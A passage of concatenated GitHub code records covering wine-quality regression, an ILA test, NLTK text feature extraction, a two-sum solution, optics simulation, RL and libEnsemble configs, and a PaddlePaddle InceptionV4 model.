existe entre el alcohol y la densidad, procedemos a hacer su \n# respectiva grafica comparativa\n\nsns.distplot(df_wine['alcohol'])\nplt.title(\"Alcohol vs Density\", fontsize= 20, pad='15',fontstyle='italic')\nplt.show()\n\n# R/= El alcohol es muy importante para determinar la calidad del vino debido a su alta correlacion\n\nsns.boxplot(x='quality', y='alcohol', data=df_wine)\nplt.title(\"Boxplot Density vs Alcohol\", fontsize= 20, pad='15',fontstyle='italic')\nplt.show()\n\n#R/= Se observa en el grafico de cajas que la calidad del vino 5 posee una cantidad considerable de \n# datos atipicos (outliers)\n\ndf_wine['quality_label'] = df_wine['quality'].apply(lambda value: ('low' if value <= 5 else 'medium') if value <= 7 else 'high')\nprint(df_wine)\nprint('='*158)\n\n# Convierto la valriable 'quality_label en categorica'\n\ndf_wine['quality_label'] = pd.Categorical(df_wine['quality_label'], categories=['low', 'medium', 'high'])\nprint(df_wine)\nprint(df_wine.dtypes)\nprint('='*158)\n\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfig = df_wine.hist(bins=15, color='b', edgecolor='darkmagenta', linewidth=1.0, xlabelsize=10, ylabelsize=10, xrot=45, yrot=0, figsize=(8,7), grid=False)\nplt.tight_layout(rect=(0, 0, 1.5, 1.5))\nplt.show()\n\n# Analisis de Regresion con Scikit-Learn \n\n# Convierto la variable quality_label de categorica string en categorica numerica\n\nlabel_quality = LabelEncoder()\ndf_wine['quality_label'] = label_quality.fit_transform(df_wine['quality_label'])\nprint(df_wine['quality_label'].unique())\nprint('='*158)\n\n# R/= Se convirtieron los valores de la variable quality_label en numerica. se puede observar que low=1, medium=2, high=0\n\n# Solo trabajo con las columnas de interes\n\ndf_wine_training = df_wine.drop(['color', 'quality_label'], axis=1)\nX = df_wine_training.values\ny = df_wine['quality_label'].values\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size= .30, random_state=42)\n\n# Aplicando Regresion Logistica\n\nlogreg = LogisticRegression()\nlogreg.fit(X_train, y_train)\ny_pred = logreg.predict(X_test)\n\nprint('Exactitud de:', sklearn.metrics.accuracy_score(y_test, y_pred))\n# R/= Con LogisticRegression() Se alcanzo una exactitud del 94%\n\n# Aplicando KNearestNeighbors\n\n#model_names=['KNearestNeighbors']\n\n#acc=[]\n#eval_acc={}\n#classification_model=KNeighborsClassifier()\n#classification_model.fit(X_train,y_train)\n#pred=classification_model.predict(X_test)\n#acc.append(accuracy_score(pred,y_test))\n#eval_acc={'Modelling Algorithm':model_names,'Accuracy':acc} \n\n#print('Exactitud de:', eval_acc)\n\n# R/= Con KNearestNeighbors se alcanzo una exactitud del 71%\n","repo_name":"richardon13/quality_wine","sub_path":"quality_wine.py","file_name":"quality_wine.py","file_ext":"py","file_size_in_byte":4962,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36381365637","text":"import ila\nimport os\nfrom random import randint\n\ndef main():\n c = ila.Abstraction(\"test\")\n\n top = c.bool(True)\n bot = c.bool(False)\n\n x = c.reg('x', 8)\n y = c.reg('y', 8)\n\n g = c.fun('cnst', 8, [])\n h1 = ila.appfun(g, [])\n h2 = c.const(40, 8)\n c.add_assumption((h1 >= 10) & (h1 <= 15))\n val = ila.choice('val', h1, h2)\n res = val + x + y\n\n def sim(d):\n x = d['x']\n y = d['y']\n d_out = {}\n d_out['res'] = (x + y + randint(11, 12)) & 0xff\n return d_out\n\n res_s = c.syn_elem('res', res, sim)\n assert c.areEqual(res_s, h1 + x + y)\n\n z = c.reg('z', 16)\n c0 = c.const(0, 8)\n c1 = c.const(1, 8)\n cmax = c.const(255, 8)\n \n f = c.fun('foo', 8, [8, 16])\n r = ila.appfun(f, x, z)\n t = ila.appfun(f, y, z)\n eq = x == y\n req = r == t\n assert c.areEqual(ila.implies(eq, req), top)\n\n assert c.areEqual(r <= cmax, top)\n\n up = c.const(128, 8)\n down = c.const(120, 16)\n con = ila.implies((x < up) & (z > down), ila.appfun(f, x, z) > up)\n test = ila.implies(con & (x == 125) & (z == 125), ila.appfun(f, x, z) > up)\n assert c.areEqual(test, top)\n\n x_next = ila.appfun(f, y, z)\n c.set_next('x', x_next)\n\n exportFile = 'tmp/test_ila_export.txt'\n c.exportAll(exportFile)\n c.importAll(exportFile)\n\n simFile = 'tmp/test_ila_sim.hpp'\n c.generateSim(simFile)\n\nif __name__ == '__main__':\n main()\n","repo_name":"zhanghongce/TACAS-artifact","sub_path":"ILAng/ILA-Tools/py-tmpl-synth/test/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"21903137432","text":"from __future__ import division, unicode_literals\nimport nltk\nfrom nltk.corpus import PlaintextCorpusReader\nfrom nltk import Text\n\ngenreList = [u'adventure', u'belles_lettres', u'editorial', u'fiction', u'government', u'hobbies', u'humor', u'learned', u'lore', u'mystery', u'news', u'religion', u'reviews', u'romance', u'science_fiction']\nimport os\nimport csv\nfrom sys import argv\nimport re\nimport numpy as np\nfrom textblob import TextBlob as tb\nimport math\nfrom sklearn.feature_extraction.text import TfidfVectorizer, TfidfTransformer\nimport string\nfrom nltk import word_tokenize\n\n# 1. directory of extracting\n# 2. output location\n# 3. output filename\n\n\n# Find the word frequencies in all the texts in corpora(ratio)\n# Find the word frequency in the text (ratio)\n# Multiply them\nmapFeatures = {}\ntitle = ['ID','File Name', 'Single Sentence Paragraph Count', 'Single sentence paragraph/ sentence ratio',\n 'Paragraph Length Mean', 'Closing parenthesis frequency',\n 'Opening Parenthesis Frequency', 'Number frequency',\n 'Forward slash frequency', 'Single sentence distribution value',\n 'Colon frequency', 'Sentence length mean', 'Top 10 tf-idf average precision','Type/token ratio',\n 'Document Length', 'Paragraph Length STD', 'Hyphen Frequency']\n\ndef countExists(numCount, symbol, words):\n if (symbol in words):\n numCount += 1\n return numCount\n\nmy_sent_tokenizer = nltk.RegexpTokenizer('[^.!?]+')\n#corpus1 = PlaintextCorpusReader(os.getcwd() + '/' + argv[1], '.*txt', sent_tokenizer=my_sent_tokenizer)\n\ncorpus1 = PlaintextCorpusReader(os.getcwd() + '/' + argv[1], '.*txt')\noutputFile = open(os.getcwd() + '/' + argv[2] + '/' + argv[3], 'w')\noutput_writer = csv.writer(outputFile)\noutput_writer.writerow(title)\n\ntotalWords = corpus1.words()\ndistinct = {}\n\ncountDocument = 0\nfor w in totalWords:\n if w in distinct:\n distinct[w] += 1\n else:\n distinct[w] = 1\n\nfor j in distinct.keys():\n distinct[j] = distinct[j] / len(totalWords)\n\n\nfor i in corpus1.fileids():\n countDocument += 1\n totalWordLength = 0.0\n totalSentLength = 0.0\n maxSentLength = 0.0\n meanSentLength = 0.0\n avgParagraphLength = 0.0\n numParagraphs = 0.0\n numwords = 0.0\n numNumber = 0.0\n\n print (\"Percentage of completion\")\n print (countDocument / float(len(corpus1.fileids())))\n paraLengthMean = 0.0\n distinctWordList = []\n\n numOpenParantheses = 0.0\n numClosedParantheses = 0.0\n avgOpenParantheses = 0.0\n avgClosedParantheses = 0.0\n\n numForwardSlash = 0.0\n numColon = 0.0\n numHyphen = 0\n numQuotation = 0\n corpus0 = PlaintextCorpusReader(os.getcwd() + '/' + argv[1] + '/', i)\n words = corpus0.words()\n sentences = corpus0.sents()\n paras = corpus0.paras()\n\n numWords = len(corpus0.words())\n numParagraphs = len(paras)\n\n numSingleSentPara = 0\n paraLengthList = []\n listUniCodeChar = u'.!?;'\n middleDocument = float (len(sentences)/ 2)\n singleSentDistributionArray = []\n sentLocation = 0\n tfidfList = []\n\n wordFreq = {}\n for p in paras:\n sentCount = 0\n #List of words in each paragraph\n for word in p:\n\n #Go through each word\n for w in word:\n if (w in listUniCodeChar):\n sentCount +=1\n sentLocation +=1\n\n if (sentCount == 1):\n numSingleSentPara +=1\n singleSentDistributionArray.append((sentLocation-middleDocument))\n\n paraLengthList.append(len(p))\n\n avgSingleSentDist = np.mean(singleSentDistributionArray)\n ratioSingleSentPara= numSingleSentPara/len(sentences)\n if (len(paraLengthList) > 1):\n stdParaLength = np.std(paraLengthList, ddof = 1)\n else:\n stdParaLength = 0\n\n for sent in sentences:\n totalSentLength += len(sent)\n if (len(sent) > maxSentLength):\n maxSentLength = len(sent)\n meanSentLength = totalSentLength / len(sentences)\n print (totalSentLength)\n print (\"Mean\")\n print (meanSentLength)\n print (len(sentences))\n for word in words:\n word = word.lower()\n\n if not (word in distinctWordList):\n distinctWordList.append(word)\n if (word in wordFreq):\n wordFreq[word] +=1\n else:\n wordFreq [word] = 1\n\n numClosedParantheses = countExists(numOpenParantheses, '(', word)\n numClosedParantheses = countExists(numClosedParantheses, ')', word)\n numHyphen = countExists(numHyphen, '-', word)\n numForwardSlash = countExists(numForwardSlash,'/', word)\n numColon = countExists(numColon, ':', word)\n if(word.isdigit()):\n numNumber += 1\n\n totalWordLength = totalWordLength + len(word)\n\n for wo in wordFreq.keys():\n wordFreq[wo] = wordFreq[wo] / len (words)\n\n for wo in wordFreq.keys():\n if (wo in distinct) and (distinct[wo] != 0.0):\n currenttfidf = wordFreq[wo] * distinct[wo]\n tfidfList.append(currenttfidf)\n tfidfList.sort(reverse=True)\n averagetfidf = np.mean(tfidfList[0:9])\n typeRatio = len(distinctWordList) / numWords\n\n print (\"TF_IDF\")\n print(averagetfidf)\n\n paraLengthMean = totalWordLength / numParagraphs\n mapFeatures[i] = [countDocument, numSingleSentPara, ratioSingleSentPara, paraLengthMean,\n numClosedParantheses,numOpenParantheses, numNumber,\n numForwardSlash, avgSingleSentDist, numColon, meanSentLength,\n typeRatio, averagetfidf, numWords, stdParaLength, numHyphen]\n\n output_writer.writerow([countDocument, i,numSingleSentPara, ratioSingleSentPara, paraLengthMean,\n numClosedParantheses, numOpenParantheses, numNumber,\n numForwardSlash, avgSingleSentDist, numColon, meanSentLength, typeRatio,\n averagetfidf, numWords, stdParaLength, numHyphen])\n\n\n\n","repo_name":"nhhoang96/Cross_Lingual-Classification","sub_path":"corpus_reader.py","file_name":"corpus_reader.py","file_ext":"py","file_size_in_byte":5946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"7495650676","text":"from typing import List\n\n\nclass Solution:\n def twoSum(self, numbers: List[int], target: int) -> List[int]:\n l, r = 0, len(numbers) - 1\n\n while l < r:\n total = numbers[l] + numbers[r]\n\n if total == target:\n return [l + 1, r + 1]\n elif total < target:\n l += 1\n else:\n r -= 1\n\n return []\n\n\n\"\"\"\nExplanation:\n\nInitialize pointers l and r to the start and end of the list. Enter a loop to calculate the sum of the numbers at indices l and r. If total == target, return a list containing the indices of the two numbers. If total < target, move the left pointer l to the right. If total > target, move the right pointer r to the left. If the loop exits without finding a match, an empty list is returned.\n\nNotes:\n\nTime complexity: O(n), as the input array is traversed at most once.\n\nSpace complexity: O(1), as we use constant extra space to store the two pointers and sum.\n\"\"\"\n\n# Test 1: Min length, not valid\nnums = [2, 4]\ntarget = 7\ntwo_sum = Solution().twoSum(nums, target)\nexpected = []\nassert two_sum == expected, f\"Expected {expected} but got {two_sum}\"\n\n# Test 2: Min length, valid\nnums = [2, 4]\ntarget = 6\ntwo_sum = Solution().twoSum(nums, target)\nexpected = [1, 2]\nassert two_sum == expected, f\"Expected {expected} but got {two_sum}\"\n\n# Test 3: Valid pair\nnums = [2, 7, 11, 15]\ntarget = 9\ntwo_sum = Solution().twoSum(nums, target)\nexpected = [1, 2]\nassert two_sum == expected, f\"Expected {expected} but got {two_sum}\"\n\n# Test 4: No valid pair\nnums = [2, 7, 11, 15]\ntarget = 14\ntwo_sum = Solution().twoSum(nums, target)\nexpected = []\nassert two_sum == expected, f\"Expected {expected} but got {two_sum}\"\n\n# Test 5: Duplicate valid pair\nnums = [3, 3, 4]\ntarget = 6\ntwo_sum = Solution().twoSum(nums, target)\nexpected = [1, 2]\nassert two_sum == expected, f\"Expected {expected} but got {two_sum}\"\n\n# Test 6: Duplicate invalid pair\nnums = [3, 2, 5]\ntarget = 6\ntwo_sum = Solution().twoSum(nums, target)\nexpected = []\nassert two_sum == expected, f\"Expected {expected} but got {two_sum}\"\n","repo_name":"garofalof/algopractice_python","sub_path":"medium/167_Two_Sum_II_Input_Array_Is_Sorted.py","file_name":"167_Two_Sum_II_Input_Array_Is_Sorted.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30790383555","text":"#%%\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom pynuin.main.zernike import wfe\nfrom numpy.fft import fft2, ifft2, fftshift\nfrom matplotlib.colors import LogNorm\nfrom matplotlib import ticker\n\n\n'''prepare matrices'''\nx = np.linspace(-5, 5, 100)#np.arange(-7, 7, 0.2)\ny = np.linspace(-5, 5, 100)#np.arange(-7, 7, 0.2)\n\nwfe_img = np.zeros((len(x), len(y)))\naperture1_plot = np.zeros((len(x), len(y)))\naperture1 = np.zeros((len(x), len(y)), dtype=complex)\naperture2prime = np.zeros((len(x), len(y)))\ne_ideal = np.zeros((len(x), len(y)), dtype=complex)\ne_aberrated = np.zeros((len(x), len(y)), dtype=complex)\ne_sum = np.zeros((len(x), len(y)), dtype=complex)\ne_diff = np.zeros((len(x), len(y)), dtype=complex)\n\nimins = []\nimaxs = []\nnulls = []\napertures = np.arange(0.1, 2, 0.1)\n\n\n'''calculations'''\nfor d2_2 in apertures:\n for counterx, elx in enumerate(x):\n for countery, ely in enumerate(y):\n \n # perform transformation to polar coordinates\n ra = np.sqrt(elx**2+ely**2)\n the = np.arctan2(ely, elx)\n \n # define constants\n a0 = 1\n D1_2 = 0.8\n \n D2_2 = d2_2\n lam = 1e-5\n \n # # specify wafefront error\n list_wfe = [(2, -2, 0.5e-5)]\n wfe_gen = float(wfe(list_wfe, ra, the))\n wfe_img[counterx][countery] = float(wfe(list_wfe, ra, the))\n \n # define aprture 1\n aperture1_plot[counterx][countery] = a0*np.heaviside(D1_2-ra, 1)*np.heaviside(ra, 1)\n aperture1[counterx][countery] = a0*np.heaviside(D1_2-ra, 1)*np.heaviside(ra, 1)*np.exp(-2*np.pi*1j*wfe_gen/lam)\n # if ra <= D1_2:\n # aperture1[counterx][countery] = a0\n \n # define aperture 2\n if ra <= D2_2:\n aperture2prime[counterx][countery] = a0\n \n # e field in aperture 1 plane\n e_field_a1_id = fftshift(fft2(aperture1_plot))\n e_field_a1_ab = fftshift(fft2(aperture1))\n # intensity_a1 = abs(e_field_a1.real)**2\n \n # e field in aperture 2 plane\n e_field_a2_id = e_field_a1_id * aperture2prime\n e_field_a2_ab = e_field_a1_ab * aperture2prime\n # intensity_a2 = abs(e_field_a2.real)**2\n \n # e field in imaging plane\n e_field_id = ifft2(e_field_a2_id)\n e_field_ab = ifft2(e_field_a2_ab)\n \n # sum and diff of e fields\n e_plus = e_field_id + e_field_ab\n e_minus = e_field_id - e_field_ab\n \n # calculate intensity in image plane\n intensity_max = abs(e_plus.real)**2\n intensity_min = abs(e_minus.real)**2\n \n \n \n # define null\n imax = np.sum(intensity_max)\n imin = np.sum(intensity_min)\n null = imin/imax\n print(imax)\n print(imin)\n print(null)\n imins.append(imin)\n imaxs.append(imax)\n nulls.append(null)\n# null = irr_min/irr_max\n \n\n\n# plt.plot(apertures, imins, label=\"imins\")\n# plt.plot(apertures, imaxs, label=\"imaxs\")\nplt.plot(apertures, nulls, label=\"nulls\")\nplt.legend()\nplt.show()\n\n\n'''plotting'''\n# fig, axs = plt.subplots(3, 2)\n\n# # ideal irradiance\n# img1 = axs[0, 0].imshow(aperture1_plot)\n# fig.colorbar(img1, ax=axs[0, 0], fraction=0.046, pad=0.04)\n# axs[0, 0].set_title(\"A$_1$\")\n\n# # maximum irradiance\n# img2 = axs[0, 1].imshow(aperture2prime)\n# fig.colorbar(img2, ax=axs[0, 1], fraction=0.046, pad=0.04)\n# axs[0, 1].set_title(\"A$_2$\")\n\n# # wfe\n# img3 = axs[1, 0].imshow(e_field_a2_id.real)\n# # img3.set_clim(1e-5, np.amax(intensity_a1))\n# fig.colorbar(img3, ax=axs[1, 0], fraction=0.046, pad=0.04)\n# axs[1, 0].set_title(\"E id clean\")\n\n\n# # wfe\n# img4 = axs[1, 1].imshow(e_field_a2_ab.real)\n# # img4.set_clim(1e-5, np.amax(intensity_a2))\n# fig.colorbar(img4, ax=axs[1, 1], fraction=0.046, pad=0.04)\n# axs[1, 1].set_title(\"E ab clean\")\n\n\n\n# # difference between intensities\n# img6 = axs[2, 0].imshow(intensity_max)\n# # img4.set_clim(0.5e1, np.amax(intensity))\n# fig.colorbar(img6, ax=axs[2, 0], fraction=0.046, pad=0.04)\n# axs[2, 0].set_title(\"I max\")\n\n\n# # difference between intensities\n# img5 = axs[2, 1].imshow(intensity_min)\n# # img4.set_clim(0.5e1, np.amax(intensity))\n# fig.colorbar(img5, ax=axs[2, 1], fraction=0.046, pad=0.04)\n# axs[2, 1].set_title(\"I min\")\n\n\n\n# # irr aberrated\n# img5 = axs[1, 0].imshow(irr_aberrated)\n# fig.colorbar(img5, ax=axs[1, 0], fraction=0.046, pad=0.04)\n# axs[1, 0].set_title(\"$I_{aberrated}$\")\n\n# # minimum irradiance\n# img6 = axs[1, 1].imshow(irr_min)\n# fig.colorbar(img6, ax=axs[1, 1], fraction=0.046, pad=0.04)\n# axs[1, 1].set_title(\"$I_{min}$\")\n\n# # null\n# # img7 = axs[1, 2].imshow(null, norm=LogNorm())\n# # cb = fig.colorbar(img7, ax=axs[1, 2], fraction=0.046, pad=0.04)\n# # tick_locator = ticker.MaxNLocator(nbins=2)\n# # cb.locator = tick_locator\n# # cb.update_ticks()\n# axs[1, 2].set_title(\"Null\")\n\n# # plt.tight_layout(pad=1.5)\n# plt.subplots_adjust(wspace=-0.2, hspace=0.71)\n# plt.savefig(\"plot.pdf\")\n# plt.show()\n\n\n\n# plt.imshow(null, norm=LogNorm())\n# plt.clim(-1e-18, 0)\n# plt.colorbar()\n\n# plt.show()\n# # cb = fig.colorbar(img7, ax=axs[1, 2], fraction=0.046, pad=0.04)\n# # tick_locator = ticker.MaxNLocator(nbins=2)\n# # cb.locator = tick_locator\n# # cb.update_ticks()\n# # axs[1, 2].set_title(\"Null\")","repo_name":"pahuber/PyNuIn","sub_path":"old/run_pinhole_ideal_aberrated_experimental.py","file_name":"run_pinhole_ideal_aberrated_experimental.py","file_ext":"py","file_size_in_byte":5405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24871858934","text":"import os\nimport copy\n\nfrom spirl.utils.general_utils import AttrDict\nfrom spirl.rl.components.agent import FixedIntervalHierarchicalAgent\nfrom spirl.rl.policies.mlp_policies import MLPPolicy\nfrom spirl.rl.components.critic import MLPCritic\nfrom spirl.rl.components.replay_buffer import UniformReplayBuffer\nfrom spirl.rl.agents.ac_agent import SACAgent\nfrom spirl.rl.agents.skill_space_agent import SkillSpaceAgent\nfrom spirl.models.skill_prior_mdl import SkillPriorMdl\nfrom spirl.configs.default_data_configs.gts import data_spec\n\nfrom spirl.rl.envs.gts_multi import GTSEnv_Multi\nfrom spirl.rl.components.sampler_multi import HierarchicalSamplerMulti\nfrom spirl.rl.components.sampler_batched import SamplerBatched, HierarchicalSamplerBached\n\nfrom spirl.rl.envs.gts import GTSEnv_Base\nfrom spirl.rl.components.sampler import HierarchicalSampler\n\nfrom spirl.utils.gts_utils import eval_time_trial_done_function, eval_time_trial_reward_function\ncurrent_dir = os.path.dirname(os.path.realpath(__file__))\n\nnotes = 'hierarchical RL on the gts env'\n\n# Environment\nenv_config = AttrDict(\n reward_norm=1.,\n # do_init = False,\n # action_standard = True,\n\n # reward_function = eval_time_trial_reward_function,\n # done_function = eval_time_trial_done_function,\n \n)\n\nconfiguration = {\n 'seed': 2,\n 'agent': FixedIntervalHierarchicalAgent,\n \n 'data_dir': '.',\n 'num_epochs': 2000,\n 'max_rollout_len': 10000,\n 'n_steps_per_epoch': 10000,\n 'n_warmup_steps': 160000,\n 'use_update_after_sampling':True,\n\n 'environment': GTSEnv_Multi,\n\n # 'environment':GTSEnv_Base,\n # 'sampler':HierarchicalSampler,\n 'sampler':HierarchicalSamplerBached,\n\n\n # 'n_steps_per_epoch': 200,\n # 'n_warmup_steps': 200,\n\n}\nconfiguration = AttrDict(configuration)\n\nsampler_config = AttrDict(\n number_of_agents = 20,\n)\n\n# Replay Buffer\nreplay_params = AttrDict(\n dump_replay=False,\n)\n\n# Observation Normalization\nobs_norm_params = AttrDict(\n)\n\nbase_agent_params = AttrDict(\n # batch_size=256, #256,\n batch_size=64, \n replay=UniformReplayBuffer,\n replay_params=replay_params,\n clip_q_target=False,\n)\n\n\n###### Low-Level ######\n# LL Policy\nll_model_params = AttrDict(\n state_dim=data_spec.state_dim,\n action_dim=data_spec.n_actions,\n kl_div_weight=5e-4,\n nz_enc=128,\n nz_mid=128,\n n_processing_layers=5,\n # nz_vae=10,\n nz_vae = 6,\n n_rollout_steps=4,\n)\n\n\n# LL Agent\nll_agent_config = copy.deepcopy(base_agent_params)\nll_agent_config.update(AttrDict(\n model=SkillPriorMdl,\n model_params=ll_model_params,\n model_checkpoint=os.path.join(os.environ[\"EXP_DIR\"],\n \"skill_prior_learning/gts/hierarchical\"),\n))\n\n###### High-Level ########\n# HL Policy\nhl_policy_params = AttrDict(\n action_dim=ll_model_params.nz_vae, # z-dimension of the skill VAE\n input_dim=data_spec.state_dim,\n max_action_range=1., # prior is Gaussian with unit variance\n nz_mid=256,\n n_layers=5,\n)\n\n# HL Critic\nhl_critic_params = AttrDict(\n action_dim=hl_policy_params.action_dim,\n input_dim=hl_policy_params.input_dim,\n output_dim=1,\n n_layers=5, # number of policy network layer\n nz_mid=256,\n action_input=True,\n)\n\n# HL Agent\nhl_agent_config = copy.deepcopy(base_agent_params)\nhl_agent_config.update(AttrDict(\n policy=MLPPolicy,\n policy_params=hl_policy_params,\n critic=MLPCritic,\n critic_params=hl_critic_params,\n))\n\n\n##### Joint Agent #######\nagent_config = AttrDict(\n hl_agent=SACAgent,\n hl_agent_params=hl_agent_config,\n ll_agent=SkillSpaceAgent,\n ll_agent_params=ll_agent_config,\n hl_interval=ll_model_params.n_rollout_steps,\n log_video_caption=False,\n\n update_iterations = 1280,\n discount_factor = 0.98 ,\n)\n\n# Dataset - Random data\ndata_config = AttrDict()\ndata_config.dataset_spec = data_spec\n\n","repo_name":"CeHao1/spirl_gts","sub_path":"spirl/configs/hrl/gts/base_conf.py","file_name":"base_conf.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21182421871","text":"import glob\nimport os\nimport time\n\nfrom balsam.api import ApplicationDefinition, BatchJob\n\n\"\"\"\nThis file is roughly equivalent to a traditional batch submission shell script\nthat used legacy Balsam commands, except it uses the Balsam API to submit jobs\nto the scheduler. It can also be run from anywhere and still submit jobs to\nthe same machine. It loads, parameterizes, and submits the LibensembleApp for\nexecution. Use this script to run libEnsemble as a Balsam Job on compute nodes.\n\nIf running libEnsemble on a laptop, this script is not needed. Just run the\ncorresponding libEnsemble calling script as normal.\n\"\"\"\n\nBALSAM_SITE = \"jln_theta\"\n\n# Batch Session Parameters\nBATCH_NUM_NODES = 5\nBATCH_WALL_CLOCK_TIME = 60\nPROJECT = \"CSC250STMS07\"\nQUEUE = \"debug-flat-quad\"\n\n# libEnsemble Job Parameters - A subset of above resources dedicated to libEnsemble\nLIBE_NODES = 1\nLIBE_RANKS = 5\n\n# This script cancels remote allocation once SIM_MAX statfiles transferred\nTRANSFER_DESTINATION = \"./ensemble\"\nSIM_MAX = 16\n\n# Retrieve the libEnsemble app from the Balsam service\napps = ApplicationDefinition.load_by_site(BALSAM_SITE)\nRemoteLibensembleApp = apps[\"RemoteLibensembleApp\"]\nRemoteLibensembleApp.resolve_site_id()\n\n\n# Submit the libEnsemble app as a Job to the Balsam service.\n# It will wait for a compatible, running BatchJob session (remote allocation)\nlibe_job = RemoteLibensembleApp.submit(\n workdir=\"libe_workflow\",\n num_nodes=LIBE_NODES,\n ranks_per_node=LIBE_RANKS,\n)\n\nprint(\"libEnsemble App retrieved and submitted as Job to Balsam service.\")\n\n# Submit an allocation (BatchJob) request to the libEnsemble app's site\nbatch = BatchJob.objects.create(\n site_id=libe_job.site_id,\n num_nodes=BATCH_NUM_NODES,\n wall_time_min=BATCH_WALL_CLOCK_TIME,\n job_mode=\"mpi\",\n project=PROJECT,\n queue=QUEUE,\n)\n\nprint(\"BatchJob session initialized. All Balsam apps will run in this BatchJob.\")\n\n# Wait for all forces.stat files to be transferred back, then cancel the BatchJob\nos.makedirs(TRANSFER_DESTINATION, exist_ok=True)\nprint(\"Waiting for all returned forces.stat files...\")\n\nwhile len(glob.glob(os.path.abspath(TRANSFER_DESTINATION) + \"/*.stat\")) != SIM_MAX:\n time.sleep(3)\n\nprint(\"All forces.stat files returned. Cancelling BatchJob session.\")\n\nbatch.state = \"pending_deletion\"\nbatch.save()\n\nprint(\"BatchJob session cancelled. Success!\")\n","repo_name":"Libensemble/libensemble","sub_path":"libensemble/tests/scaling_tests/forces/balsam_forces/submit_libe_forces_remotely.py","file_name":"submit_libe_forces_remotely.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"3"} +{"seq_id":"23446947175","text":"import paddle\nfrom paddle import ParamAttr\nimport paddle.nn as nn\nimport paddle.nn.functional as F\nfrom paddle.nn import Conv2D, BatchNorm, Linear, Dropout\nfrom paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D\nfrom paddle.nn.initializer import Uniform\nimport math\n\nfrom ....utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url\n\nMODEL_URLS = {\n \"InceptionV4\":\n \"https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/InceptionV4_pretrained.pdparams\"\n}\n\n__all__ = list(MODEL_URLS.keys())\n\n\nclass ConvBNLayer(nn.Layer):\n def __init__(self,\n num_channels,\n num_filters,\n filter_size,\n stride=1,\n padding=0,\n groups=1,\n act='relu',\n name=None):\n super(ConvBNLayer, self).__init__()\n\n self._conv = Conv2D(\n in_channels=num_channels,\n out_channels=num_filters,\n kernel_size=filter_size,\n stride=stride,\n padding=padding,\n groups=groups,\n weight_attr=ParamAttr(name=name + \"_weights\"),\n bias_attr=False)\n bn_name = name + \"_bn\"\n self._batch_norm = BatchNorm(\n num_filters,\n act=act,\n param_attr=ParamAttr(name=bn_name + \"_scale\"),\n bias_attr=ParamAttr(name=bn_name + \"_offset\"),\n moving_mean_name=bn_name + '_mean',\n moving_variance_name=bn_name + '_variance')\n\n def forward(self, inputs):\n y = self._conv(inputs)\n y = self._batch_norm(y)\n return y\n\n\nclass InceptionStem(nn.Layer):\n def __init__(self):\n super(InceptionStem, self).__init__()\n self._conv_1 = ConvBNLayer(\n 3, 32, 3, stride=2, act=\"relu\", name=\"conv1_3x3_s2\")\n self._conv_2 = ConvBNLayer(32, 32, 3, act=\"relu\", name=\"conv2_3x3_s1\")\n self._conv_3 = ConvBNLayer(\n 32, 64, 3, padding=1, act=\"relu\", name=\"conv3_3x3_s1\")\n self._pool = MaxPool2D(kernel_size=3, stride=2, padding=0)\n self._conv2 = ConvBNLayer(\n 64, 96, 3, stride=2, act=\"relu\", name=\"inception_stem1_3x3_s2\")\n self._conv1_1 = ConvBNLayer(\n 160, 64, 1, act=\"relu\", name=\"inception_stem2_3x3_reduce\")\n self._conv1_2 = ConvBNLayer(\n 64, 96, 3, act=\"relu\", name=\"inception_stem2_3x3\")\n self._conv2_1 = ConvBNLayer(\n 160, 64, 1, act=\"relu\", name=\"inception_stem2_1x7_reduce\")\n self._conv2_2 = ConvBNLayer(\n 64,\n 64, (7, 1),\n padding=(3, 0),\n act=\"relu\",\n name=\"inception_stem2_1x7\")\n self._conv2_3 = ConvBNLayer(\n 64,\n 64, (1, 7),\n padding=(0, 3),\n act=\"relu\",\n name=\"inception_stem2_7x1\")\n self._conv2_4 = ConvBNLayer(\n 64, 96, 3, act=\"relu\", name=\"inception_stem2_3x3_2\")\n self._conv3 = ConvBNLayer(\n 192, 192, 3, stride=2, act=\"relu\", name=\"inception_stem3_3x3_s2\")\n\n def forward(self, inputs):\n conv = self._conv_1(inputs)\n conv = self._conv_2(conv)\n conv = self._conv_3(conv)\n\n pool1 = self._pool(conv)\n conv2 = self._conv2(conv)\n concat = paddle.concat([pool1, conv2], axis=1)\n\n conv1 = self._conv1_1(concat)\n conv1 = self._conv1_2(conv1)\n\n conv2 = self._conv2_1(concat)\n conv2 = self._conv2_2(conv2)\n conv2 = self._conv2_3(conv2)\n conv2 = self._conv2_4(conv2)\n\n concat = paddle.concat([conv1, conv2], axis=1)\n\n conv1 = self._conv3(concat)\n pool1 = self._pool(concat)\n\n concat = paddle.concat([conv1, pool1], axis=1)\n return concat\n\n\nclass InceptionA(nn.Layer):\n def __init__(self, name):\n super(InceptionA, self).__init__()\n self._pool = AvgPool2D(kernel_size=3, stride=1, padding=1)\n self._conv1 = ConvBNLayer(\n 384, 96, 1, act=\"relu\", name=\"inception_a\" + name + \"_1x1\")\n self._conv2 = ConvBNLayer(\n 384, 96, 1, act=\"relu\", name=\"inception_a\" + name + \"_1x1_2\")\n self._conv3_1 = ConvBNLayer(\n 384, 64, 1, act=\"relu\", name=\"inception_a\" + name + \"_3x3_reduce\")\n self._conv3_2 = ConvBNLayer(\n 64,\n 96,\n 3,\n padding=1,\n act=\"relu\",\n name=\"inception_a\" + name + \"_3x3\")\n self._conv4_1 = 